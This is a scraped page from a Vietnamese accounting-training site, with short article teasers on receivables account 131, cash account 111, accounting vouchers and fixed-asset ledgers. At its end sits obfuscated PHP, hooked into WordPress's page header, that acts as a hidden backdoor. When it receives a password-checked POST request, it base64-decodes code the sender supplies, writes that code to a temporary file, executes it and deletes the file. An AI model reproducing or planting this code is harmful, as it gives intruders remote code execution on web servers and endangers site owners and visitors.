1
Nghiệp vụ kế toán

TÀI KHOẢN 131 – PHẢI THU KHÁCH HÀNG

Trung tâm đào tạo CÔNG TY KẾ TOÁN HÀ NỘI tham khảo và chia sẻ TÀI KHOẢN 131 – PHẢI THU KHÁCH HÀNG I – khái niệm: Tài khoản 131 – Phải thu khách hàng này dùng để được dùng

Xem thêm

Hạch toán tài khoản 111 tiền mặt

Tài khoản 111 – Tiền mặt là tài khoản dùng để phản ánh tình hình thu, chi, tồn tiền mặt của doanh nghiệp bao gồm: Tiền Việt Nam, ngoại tệ, vàng bạc, kim khí quý, đá quý. Sơ đồ hạch toán

Xem thêm

Tài khoản 111 tiền mặt

Công ty Kế Toán Hà Nội tham khảo và chia sẻ với các bạn về TÀI KHOẢN 11 TIỀN MẶT I- Khái niệm:  Tài khoản 111 – Tiền mặt được dùng để phản ánh tình hình thu, chi, tồn quỹ tại

Xem thêm

Chứng từ kế toán là gì?

  Trung tâm kế toán Hà Nội tham khảo và chia sẻ về tài liệu chứng từ kế toán Chứng từ kế toán là những giấy tờ và vật mang tin phản ánh nghiệp vụ kinh tế, tài chính phát

Xem thêm

SƠ ĐỒ HẠCH TOÁN TÀI SẢN CỐ ĐỊNH

Công ty Kế Toán Hà Nội tham khảo và chia sẻ về tài liệu Tài Sản Cố Định  Tài sản cố định là tất cả những tài sản của doanh nghiệp có giá trị lớn, có thời gian sử dụng,

Xem thêm
if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}